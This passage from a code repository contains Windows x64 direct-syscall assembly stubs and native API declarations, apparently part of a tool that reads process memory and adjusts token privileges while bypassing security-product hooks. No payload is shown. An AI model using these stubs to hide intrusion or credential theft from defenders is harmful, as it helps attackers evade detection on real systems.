ZwOpenProcessToken NtOpenProcessToken 605 | __asm__("NtOpenProcessToken: \n\ 606 | mov rax, gs:[0x60] \n\ 607 | NtOpenProcessToken_Check_X_X_XXXX: \n\ 608 | cmp dword ptr [rax+0x118], 6 \n\ 609 | je NtOpenProcessToken_Check_6_X_XXXX \n\ 610 | cmp dword ptr [rax+0x118], 10 \n\ 611 | je NtOpenProcessToken_Check_10_0_XXXX \n\ 612 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 613 | NtOpenProcessToken_Check_6_X_XXXX: \n\ 614 | cmp dword ptr [rax+0x11c], 1 \n\ 615 | je NtOpenProcessToken_Check_6_1_XXXX \n\ 616 | cmp dword ptr [rax+0x11c], 2 \n\ 617 | je NtOpenProcessToken_SystemCall_6_2_XXXX \n\ 618 | cmp dword ptr [rax+0x11c], 3 \n\ 619 | je NtOpenProcessToken_SystemCall_6_3_XXXX \n\ 620 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 621 | NtOpenProcessToken_Check_6_1_XXXX: \n\ 622 | cmp word ptr [rax+0x120], 7600 \n\ 623 | je NtOpenProcessToken_SystemCall_6_1_7600 \n\ 624 | cmp word ptr [rax+0x120], 7601 \n\ 625 | je NtOpenProcessToken_SystemCall_6_1_7601 \n\ 626 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 627 | NtOpenProcessToken_Check_10_0_XXXX: \n\ 628 | cmp word ptr [rax+0x120], 10240 \n\ 629 | je NtOpenProcessToken_SystemCall_10_0_10240 \n\ 630 | cmp word ptr [rax+0x120], 10586 \n\ 631 | je NtOpenProcessToken_SystemCall_10_0_10586 \n\ 632 | cmp word ptr [rax+0x120], 14393 \n\ 633 | je NtOpenProcessToken_SystemCall_10_0_14393 \n\ 634 | cmp word ptr [rax+0x120], 15063 \n\ 635 | je NtOpenProcessToken_SystemCall_10_0_15063 \n\ 636 | cmp word ptr [rax+0x120], 16299 \n\ 637 | je NtOpenProcessToken_SystemCall_10_0_16299 \n\ 638 | cmp word ptr [rax+0x120], 17134 \n\ 639 | je NtOpenProcessToken_SystemCall_10_0_17134 \n\ 640 | cmp word ptr [rax+0x120], 17763 \n\ 641 | je NtOpenProcessToken_SystemCall_10_0_17763 \n\ 642 | cmp word ptr [rax+0x120], 18362 \n\ 643 | je NtOpenProcessToken_SystemCall_10_0_18362 \n\ 644 | cmp word ptr [rax+0x120], 18363 \n\ 645 | je NtOpenProcessToken_SystemCall_10_0_18363 \n\ 646 | cmp word ptr [rax+0x120], 19041 \n\ 647 | je NtOpenProcessToken_SystemCall_10_0_19041 \n\ 648 | cmp word ptr [rax+0x120], 19042 \n\ 649 | je NtOpenProcessToken_SystemCall_10_0_19042 \n\ 650 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 651 | NtOpenProcessToken_SystemCall_6_1_7600: \n\ 652 | mov eax, 0x00f9 \n\ 653 | jmp NtOpenProcessToken_Epilogue \n\ 654 | NtOpenProcessToken_SystemCall_6_1_7601: \n\ 655 | mov eax, 0x00f9 \n\ 656 | jmp NtOpenProcessToken_Epilogue \n\ 657 | NtOpenProcessToken_SystemCall_6_2_XXXX: \n\ 658 | mov eax, 0x010b \n\ 659 | jmp NtOpenProcessToken_Epilogue \n\ 660 | NtOpenProcessToken_SystemCall_6_3_XXXX: \n\ 661 | mov eax, 0x010e \n\ 662 | jmp NtOpenProcessToken_Epilogue \n\ 663 | NtOpenProcessToken_SystemCall_10_0_10240: \n\ 664 | mov eax, 0x0114 \n\ 665 | jmp NtOpenProcessToken_Epilogue \n\ 666 | NtOpenProcessToken_SystemCall_10_0_10586: \n\ 667 | mov eax, 0x0117 \n\ 668 | jmp NtOpenProcessToken_Epilogue \n\ 669 | NtOpenProcessToken_SystemCall_10_0_14393: \n\ 670 | mov eax, 0x0119 \n\ 671 | jmp NtOpenProcessToken_Epilogue \n\ 672 | NtOpenProcessToken_SystemCall_10_0_15063: \n\ 673 | mov eax, 0x011d \n\ 674 | jmp NtOpenProcessToken_Epilogue \n\ 675 | NtOpenProcessToken_SystemCall_10_0_16299: \n\ 676 | mov eax, 0x011f \n\ 677 | jmp NtOpenProcessToken_Epilogue \n\ 678 | NtOpenProcessToken_SystemCall_10_0_17134: \n\ 679 | mov eax, 0x0121 \n\ 680 | jmp NtOpenProcessToken_Epilogue \n\ 681 | NtOpenProcessToken_SystemCall_10_0_17763: \n\ 682 | mov eax, 0x0122 \n\ 683 | jmp NtOpenProcessToken_Epilogue \n\ 684 | NtOpenProcessToken_SystemCall_10_0_18362: \n\ 685 | mov eax, 0x0123 \n\ 686 | jmp NtOpenProcessToken_Epilogue \n\ 687 | NtOpenProcessToken_SystemCall_10_0_18363: \n\ 688 | mov eax, 0x0123 \n\ 689 | jmp NtOpenProcessToken_Epilogue \n\ 690 | NtOpenProcessToken_SystemCall_10_0_19041: \n\ 691 | mov eax, 0x0128 \n\ 692 | jmp NtOpenProcessToken_Epilogue \n\ 693 | NtOpenProcessToken_SystemCall_10_0_19042: \n\ 694 | mov eax, 0x0128 \n\ 695 | jmp NtOpenProcessToken_Epilogue \n\ 696 | NtOpenProcessToken_SystemCall_Unknown: \n\ 697 | ret \n\ 698 | NtOpenProcessToken_Epilogue: \n\ 699 | mov r10, rcx \n\ 700 | syscall \n\ 701 | ret \n\ 702 | "); 703 | 704 | #define ZwOpenProcess NtOpenProcess 705 | __asm__("NtOpenProcess: \n\ 706 | mov rax, gs:[0x60] \n\ 707 | NtOpenProcess_Check_X_X_XXXX: \n\ 708 | cmp dword ptr [rax+0x118], 6 \n\ 709 | je NtOpenProcess_Check_6_X_XXXX \n\ 710 | cmp dword ptr [rax+0x118], 10 \n\ 711 | je NtOpenProcess_Check_10_0_XXXX \n\ 712 | jmp NtOpenProcess_SystemCall_Unknown \n\ 713 | NtOpenProcess_Check_6_X_XXXX: \n\ 714 | cmp dword ptr [rax+0x11c], 1 \n\ 715 | je NtOpenProcess_Check_6_1_XXXX \n\ 716 | cmp dword ptr [rax+0x11c], 2 \n\ 717 | je NtOpenProcess_SystemCall_6_2_XXXX \n\ 718 | cmp dword ptr [rax+0x11c], 3 \n\ 719 | je NtOpenProcess_SystemCall_6_3_XXXX \n\ 720 | jmp NtOpenProcess_SystemCall_Unknown \n\ 721 | NtOpenProcess_Check_6_1_XXXX: \n\ 722 | cmp word ptr [rax+0x120], 7600 \n\ 723 | je NtOpenProcess_SystemCall_6_1_7600 \n\ 724 | cmp word ptr [rax+0x120], 7601 \n\ 725 | je NtOpenProcess_SystemCall_6_1_7601 \n\ 726 | jmp NtOpenProcess_SystemCall_Unknown \n\ 727 | NtOpenProcess_Check_10_0_XXXX: \n\ 728 | cmp word ptr [rax+0x120], 10240 \n\ 729 | je NtOpenProcess_SystemCall_10_0_10240 \n\ 730 | cmp word ptr [rax+0x120], 10586 \n\ 731 | je NtOpenProcess_SystemCall_10_0_10586 \n\ 732 | cmp word ptr [rax+0x120], 14393 \n\ 733 | je NtOpenProcess_SystemCall_10_0_14393 \n\ 734 | cmp word ptr [rax+0x120], 15063 \n\ 735 | je NtOpenProcess_SystemCall_10_0_15063 \n\ 736 | cmp word ptr [rax+0x120], 16299 \n\ 737 | je NtOpenProcess_SystemCall_10_0_16299 \n\ 738 | cmp word ptr [rax+0x120], 17134 \n\ 739 | je NtOpenProcess_SystemCall_10_0_17134 \n\ 740 | cmp word ptr [rax+0x120], 17763 \n\ 741 | je NtOpenProcess_SystemCall_10_0_17763 \n\ 742 | cmp word ptr [rax+0x120], 18362 \n\ 743 | je NtOpenProcess_SystemCall_10_0_18362 \n\ 744 | cmp word ptr [rax+0x120], 18363 \n\ 745 | je NtOpenProcess_SystemCall_10_0_18363 \n\ 746 | cmp word ptr [rax+0x120], 19041 \n\ 747 | je NtOpenProcess_SystemCall_10_0_19041 \n\ 748 | cmp word ptr [rax+0x120], 19042 \n\ 749 | je NtOpenProcess_SystemCall_10_0_19042 \n\ 750 | jmp NtOpenProcess_SystemCall_Unknown \n\ 751 | NtOpenProcess_SystemCall_6_1_7600: \n\ 752 | mov eax, 0x0023 \n\ 753 | jmp NtOpenProcess_Epilogue \n\ 754 | NtOpenProcess_SystemCall_6_1_7601: \n\ 755 | mov eax, 0x0023 \n\ 756 | jmp NtOpenProcess_Epilogue \n\ 757 | NtOpenProcess_SystemCall_6_2_XXXX: \n\ 758 | mov eax, 0x0024 \n\ 759 | jmp NtOpenProcess_Epilogue \n\ 760 | NtOpenProcess_SystemCall_6_3_XXXX: \n\ 761 | mov eax, 0x0025 \n\ 762 | jmp NtOpenProcess_Epilogue \n\ 763 | NtOpenProcess_SystemCall_10_0_10240: \n\ 764 | mov eax, 0x0026 \n\ 765 | jmp NtOpenProcess_Epilogue \n\ 766 | NtOpenProcess_SystemCall_10_0_10586: \n\ 767 | mov eax, 0x0026 \n\ 768 | jmp NtOpenProcess_Epilogue \n\ 769 | NtOpenProcess_SystemCall_10_0_14393: \n\ 770 | mov eax, 0x0026 \n\ 771 | jmp NtOpenProcess_Epilogue \n\ 772 | NtOpenProcess_SystemCall_10_0_15063: \n\ 773 | mov eax, 0x0026 \n\ 774 | jmp NtOpenProcess_Epilogue \n\ 775 | NtOpenProcess_SystemCall_10_0_16299: \n\ 776 | mov eax, 0x0026 \n\ 777 | jmp NtOpenProcess_Epilogue \n\ 778 | NtOpenProcess_SystemCall_10_0_17134: \n\ 779 | mov eax, 0x0026 \n\ 780 | jmp NtOpenProcess_Epilogue \n\ 781 | NtOpenProcess_SystemCall_10_0_17763: \n\ 782 | mov eax, 0x0026 \n\ 783 | jmp NtOpenProcess_Epilogue \n\ 784 | NtOpenProcess_SystemCall_10_0_18362: \n\ 785 | mov eax, 0x0026 \n\ 786 | jmp NtOpenProcess_Epilogue \n\ 787 | NtOpenProcess_SystemCall_10_0_18363: \n\ 788 | mov eax, 0x0026 \n\ 789 | jmp NtOpenProcess_Epilogue \n\ 790 | NtOpenProcess_SystemCall_10_0_19041: \n\ 791 | mov eax, 0x0026 \n\ 792 | jmp NtOpenProcess_Epilogue \n\ 793 | NtOpenProcess_SystemCall_10_0_19042: \n\ 794 | mov eax, 0x0026 \n\ 795 | jmp NtOpenProcess_Epilogue \n\ 796 | NtOpenProcess_SystemCall_Unknown: \n\ 797 | ret \n\ 798 | NtOpenProcess_Epilogue: \n\ 799 | mov r10, rcx \n\ 800 | syscall \n\ 801 | ret \n\ 802 | "); 803 | 804 | #define ZwClose NtClose 805 | __asm__("NtClose: \n\ 806 | mov rax, gs:[0x60] \n\ 807 | NtClose_Check_X_X_XXXX: \n\ 808 | cmp dword ptr [rax+0x118], 6 \n\ 809 | je NtClose_Check_6_X_XXXX \n\ 810 | cmp dword ptr [rax+0x118], 10 \n\ 811 | je NtClose_Check_10_0_XXXX \n\ 812 | jmp NtClose_SystemCall_Unknown \n\ 813 | NtClose_Check_6_X_XXXX: \n\ 814 | cmp dword ptr [rax+0x11c], 1 \n\ 815 | je NtClose_Check_6_1_XXXX \n\ 816 | cmp dword ptr [rax+0x11c], 2 \n\ 817 | je NtClose_SystemCall_6_2_XXXX \n\ 818 | cmp dword ptr [rax+0x11c], 3 \n\ 819 | je NtClose_SystemCall_6_3_XXXX \n\ 820 | jmp NtClose_SystemCall_Unknown \n\ 821 | NtClose_Check_6_1_XXXX: \n\ 822 | cmp word ptr [rax+0x120], 7600 \n\ 823 | je NtClose_SystemCall_6_1_7600 \n\ 824 | cmp word ptr [rax+0x120], 7601 \n\ 825 | je NtClose_SystemCall_6_1_7601 \n\ 826 | jmp NtClose_SystemCall_Unknown \n\ 827 | NtClose_Check_10_0_XXXX: \n\ 828 | cmp word ptr [rax+0x120], 10240 \n\ 829 | je NtClose_SystemCall_10_0_10240 \n\ 830 | cmp word ptr [rax+0x120], 10586 \n\ 831 | je NtClose_SystemCall_10_0_10586 \n\ 832 | cmp word ptr [rax+0x120], 14393 \n\ 833 | je NtClose_SystemCall_10_0_14393 \n\ 834 | cmp word ptr [rax+0x120], 15063 \n\ 835 | je NtClose_SystemCall_10_0_15063 \n\ 836 | cmp word ptr [rax+0x120], 16299 \n\ 837 | je NtClose_SystemCall_10_0_16299 \n\ 838 | cmp word ptr [rax+0x120], 17134 \n\ 839 | je NtClose_SystemCall_10_0_17134 \n\ 840 | cmp word ptr [rax+0x120], 17763 \n\ 841 | je NtClose_SystemCall_10_0_17763 \n\ 842 | cmp word ptr [rax+0x120], 18362 \n\ 843 | je NtClose_SystemCall_10_0_18362 \n\ 844 | cmp word ptr [rax+0x120], 18363 \n\ 845 | je NtClose_SystemCall_10_0_18363 \n\ 846 | cmp word ptr [rax+0x120], 19041 \n\ 847 | je NtClose_SystemCall_10_0_19041 \n\ 848 | cmp word ptr [rax+0x120], 19042 \n\ 849 | je NtClose_SystemCall_10_0_19042 \n\ 850 | jmp NtClose_SystemCall_Unknown \n\ 851 | NtClose_SystemCall_6_1_7600: \n\ 852 | mov eax, 0x000c \n\ 853 | jmp NtClose_Epilogue \n\ 854 | NtClose_SystemCall_6_1_7601: \n\ 855 | mov eax, 0x000c \n\ 856 | jmp NtClose_Epilogue \n\ 857 | NtClose_SystemCall_6_2_XXXX: \n\ 858 | mov eax, 0x000d \n\ 859 | jmp NtClose_Epilogue \n\ 860 | NtClose_SystemCall_6_3_XXXX: \n\ 861 | mov eax, 0x000e \n\ 862 | jmp NtClose_Epilogue \n\ 863 | NtClose_SystemCall_10_0_10240: \n\ 864 | mov eax, 0x000f \n\ 865 | jmp NtClose_Epilogue \n\ 866 | NtClose_SystemCall_10_0_10586: \n\ 867 | mov eax, 0x000f \n\ 868 | jmp NtClose_Epilogue \n\ 869 | NtClose_SystemCall_10_0_14393: \n\ 870 | mov eax, 0x000f \n\ 871 | jmp NtClose_Epilogue \n\ 872 | NtClose_SystemCall_10_0_15063: \n\ 873 | mov eax, 0x000f \n\ 874 | jmp NtClose_Epilogue \n\ 875 | NtClose_SystemCall_10_0_16299: \n\ 876 | mov eax, 0x000f \n\ 877 | jmp NtClose_Epilogue \n\ 878 | NtClose_SystemCall_10_0_17134: \n\ 879 | mov eax, 0x000f \n\ 880 | jmp NtClose_Epilogue \n\ 881 | NtClose_SystemCall_10_0_17763: \n\ 882 | mov eax, 0x000f \n\ 883 | jmp NtClose_Epilogue \n\ 884 | NtClose_SystemCall_10_0_18362: \n\ 885 | mov eax, 0x000f \n\ 886 | jmp NtClose_Epilogue \n\ 887 | NtClose_SystemCall_10_0_18363: \n\ 888 | mov eax, 0x000f \n\ 889 | jmp NtClose_Epilogue \n\ 890 | NtClose_SystemCall_10_0_19041: \n\ 891 | mov eax, 0x000f \n\ 892 | jmp NtClose_Epilogue \n\ 893 | NtClose_SystemCall_10_0_19042: \n\ 894 | mov eax, 0x000f \n\ 895 | jmp NtClose_Epilogue \n\ 896 | NtClose_SystemCall_Unknown: \n\ 897 | ret \n\ 898 | NtClose_Epilogue: \n\ 899 | mov r10, rcx \n\ 900 | syscall \n\ 901 | ret \n\ 902 | "); 903 | 904 | #define ZwQuerySystemInformation NtQuerySystemInformation 905 | __asm__("NtQuerySystemInformation: \n\ 906 | mov rax, gs:[0x60] \n\ 907 | NtQuerySystemInformation_Check_X_X_XXXX: \n\ 908 | cmp dword ptr [rax+0x118], 6 \n\ 909 | je NtQuerySystemInformation_Check_6_X_XXXX \n\ 910 | cmp dword ptr [rax+0x118], 10 \n\ 911 | je NtQuerySystemInformation_Check_10_0_XXXX \n\ 912 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 913 | NtQuerySystemInformation_Check_6_X_XXXX: \n\ 914 | cmp dword ptr [rax+0x11c], 1 \n\ 915 | je NtQuerySystemInformation_Check_6_1_XXXX \n\ 916 | cmp dword ptr [rax+0x11c], 2 \n\ 917 | je NtQuerySystemInformation_SystemCall_6_2_XXXX \n\ 918 | cmp dword ptr [rax+0x11c], 3 \n\ 919 | je NtQuerySystemInformation_SystemCall_6_3_XXXX \n\ 920 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 921 | NtQuerySystemInformation_Check_6_1_XXXX: \n\ 922 | cmp word ptr [rax+0x120], 7600 \n\ 923 | je NtQuerySystemInformation_SystemCall_6_1_7600 \n\ 924 | cmp word ptr [rax+0x120], 7601 \n\ 925 | je NtQuerySystemInformation_SystemCall_6_1_7601 \n\ 926 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 927 | NtQuerySystemInformation_Check_10_0_XXXX: \n\ 928 | cmp word ptr [rax+0x120], 10240 \n\ 929 | je NtQuerySystemInformation_SystemCall_10_0_10240 \n\ 930 | cmp word ptr [rax+0x120], 10586 \n\ 931 | je NtQuerySystemInformation_SystemCall_10_0_10586 \n\ 932 | cmp word ptr [rax+0x120], 14393 \n\ 933 | je NtQuerySystemInformation_SystemCall_10_0_14393 \n\ 934 | cmp word ptr [rax+0x120], 15063 \n\ 935 | je NtQuerySystemInformation_SystemCall_10_0_15063 \n\ 936 | cmp word ptr [rax+0x120], 16299 \n\ 937 | je NtQuerySystemInformation_SystemCall_10_0_16299 \n\ 938 | cmp word ptr [rax+0x120], 17134 \n\ 939 | je NtQuerySystemInformation_SystemCall_10_0_17134 \n\ 940 | cmp word ptr [rax+0x120], 17763 \n\ 941 | je NtQuerySystemInformation_SystemCall_10_0_17763 \n\ 942 | cmp word ptr [rax+0x120], 18362 \n\ 943 | je NtQuerySystemInformation_SystemCall_10_0_18362 \n\ 944 | cmp word ptr [rax+0x120], 18363 \n\ 945 | je NtQuerySystemInformation_SystemCall_10_0_18363 \n\ 946 | cmp word ptr [rax+0x120], 19041 \n\ 947 | je NtQuerySystemInformation_SystemCall_10_0_19041 \n\ 948 | cmp word ptr [rax+0x120], 19042 \n\ 949 | je NtQuerySystemInformation_SystemCall_10_0_19042 \n\ 950 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 951 | NtQuerySystemInformation_SystemCall_6_1_7600: \n\ 952 | mov eax, 0x0033 \n\ 953 | jmp NtQuerySystemInformation_Epilogue \n\ 954 | NtQuerySystemInformation_SystemCall_6_1_7601: \n\ 955 | mov eax, 0x0033 \n\ 956 | jmp NtQuerySystemInformation_Epilogue \n\ 957 | NtQuerySystemInformation_SystemCall_6_2_XXXX: \n\ 958 | mov eax, 0x0034 \n\ 959 | jmp NtQuerySystemInformation_Epilogue \n\ 960 | NtQuerySystemInformation_SystemCall_6_3_XXXX: \n\ 961 | mov eax, 0x0035 \n\ 962 | jmp NtQuerySystemInformation_Epilogue \n\ 963 | NtQuerySystemInformation_SystemCall_10_0_10240: \n\ 964 | mov eax, 0x0036 \n\ 965 | jmp NtQuerySystemInformation_Epilogue \n\ 966 | NtQuerySystemInformation_SystemCall_10_0_10586: \n\ 967 | mov eax, 0x0036 \n\ 968 | jmp NtQuerySystemInformation_Epilogue \n\ 969 | NtQuerySystemInformation_SystemCall_10_0_14393: \n\ 970 | mov eax, 0x0036 \n\ 971 | jmp NtQuerySystemInformation_Epilogue \n\ 972 | NtQuerySystemInformation_SystemCall_10_0_15063: \n\ 973 | mov eax, 0x0036 \n\ 974 | jmp NtQuerySystemInformation_Epilogue \n\ 975 | NtQuerySystemInformation_SystemCall_10_0_16299: \n\ 976 | mov eax, 0x0036 \n\ 977 | jmp NtQuerySystemInformation_Epilogue \n\ 978 | NtQuerySystemInformation_SystemCall_10_0_17134: \n\ 979 | mov eax, 0x0036 \n\ 980 | jmp NtQuerySystemInformation_Epilogue \n\ 981 | NtQuerySystemInformation_SystemCall_10_0_17763: \n\ 982 | mov eax, 0x0036 \n\ 983 | jmp NtQuerySystemInformation_Epilogue \n\ 984 | NtQuerySystemInformation_SystemCall_10_0_18362: \n\ 985 | mov eax, 0x0036 \n\ 986 | jmp NtQuerySystemInformation_Epilogue \n\ 987 | NtQuerySystemInformation_SystemCall_10_0_18363: \n\ 988 | mov eax, 0x0036 \n\ 989 | jmp NtQuerySystemInformation_Epilogue \n\ 990 | NtQuerySystemInformation_SystemCall_10_0_19041: \n\ 991 | mov eax, 0x0036 \n\ 992 | jmp NtQuerySystemInformation_Epilogue \n\ 993 | NtQuerySystemInformation_SystemCall_10_0_19042: \n\ 994 | mov eax, 0x0036 \n\ 995 | jmp NtQuerySystemInformation_Epilogue \n\ 996 | NtQuerySystemInformation_SystemCall_Unknown: \n\ 997 | ret \n\ 998 | NtQuerySystemInformation_Epilogue: \n\ 999 | mov r10, rcx \n\ 1000 | syscall \n\ 1001 | ret \n\ 1002 | "); 1003 | -------------------------------------------------------------------------------- /src/include/syscalls.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "syscalls-asm.h" 5 | 6 | #ifndef InitializeObjectAttributes 7 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 8 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 9 | (p)->RootDirectory = r; \ 10 | (p)->Attributes = a; \ 11 | (p)->ObjectName = n; \ 12 | (p)->SecurityDescriptor = s; \ 13 | (p)->SecurityQualityOfService = NULL; \ 14 | } 15 | #endif 16 | 17 | typedef enum _SECTION_INHERIT 18 | { 19 | ViewShare = 1, 20 | ViewUnmap = 2 21 | } SECTION_INHERIT, *PSECTION_INHERIT; 22 | 23 | EXTERN_C NTSTATUS NtReadVirtualMemory( 24 | IN HANDLE ProcessHandle, 25 | IN PVOID BaseAddress OPTIONAL, 26 | OUT PVOID Buffer, 27 | IN SIZE_T BufferSize, 28 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 29 | 30 | EXTERN_C NTSTATUS NtOpenProcessToken( 31 | IN HANDLE ProcessHandle, 32 | IN ACCESS_MASK DesiredAccess, 33 | OUT PHANDLE TokenHandle); 34 | 35 | EXTERN_C NTSTATUS NtAdjustPrivilegesToken( 36 | IN HANDLE TokenHandle, 37 | IN BOOLEAN DisableAllPrivileges, 38 | IN PTOKEN_PRIVILEGES NewState OPTIONAL, 39 | IN ULONG BufferLength, 40 | OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL, 41 | OUT PULONG ReturnLength OPTIONAL); 42 | 43 | EXTERN_C NTSTATUS NtOpenProcess( 44 | OUT PHANDLE ProcessHandle, 45 | IN ACCESS_MASK DesiredAccess, 46 | IN POBJECT_ATTRIBUTES ObjectAttributes, 47 | IN PCLIENT_ID ClientId OPTIONAL); 48 | 49 | EXTERN_C NTSTATUS NtClose( 50 | IN HANDLE Handle); 51 | 52 | EXTERN_C NTSTATUS NtQuerySystemInformation( 53 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 54 | IN OUT PVOID SystemInformation, 55 | IN ULONG SystemInformationLength, 56 | OUT PULONG ReturnLength OPTIONAL); 57 | 58 | EXTERN_C NTSTATUS NtMapViewOfSection( 59 | IN HANDLE SectionHandle, 60 | IN HANDLE ProcessHandle, 61 | IN OUT PVOID BaseAddress, 62 | IN ULONG ZeroBits, 63 | IN SIZE_T CommitSize, 64 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 65 | IN OUT PSIZE_T ViewSize, 66 | IN SECTION_INHERIT InheritDisposition, 67 | IN ULONG AllocationType, 68 | IN ULONG Win32Protect); 69 | 70 | EXTERN_C NTSTATUS NtCreateSection( 71 | OUT PHANDLE SectionHandle, 72 | IN ACCESS_MASK DesiredAccess, 73 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 74 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 75 | IN ULONG SectionPageProtection, 76 | IN ULONG AllocationAttributes, 77 | IN HANDLE FileHandle OPTIONAL); 78 | 79 | EXTERN_C NTSTATUS NtCreateTransaction( 80 | OUT PHANDLE TransactionHandle, 81 | IN ACCESS_MASK DesiredAccess, 82 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 83 | IN LPGUID Uow OPTIONAL, 84 | IN HANDLE TmHandle OPTIONAL, 85 | IN ULONG CreateOptions OPTIONAL, 86 | IN ULONG IsolationLevel OPTIONAL, 87 | IN ULONG IsolationFlags OPTIONAL, 88 | IN PLARGE_INTEGER Timeout OPTIONAL, 89 | IN PUNICODE_STRING Description OPTIONAL); 90 | 91 | 92 | --------------------------------------------------------------------------------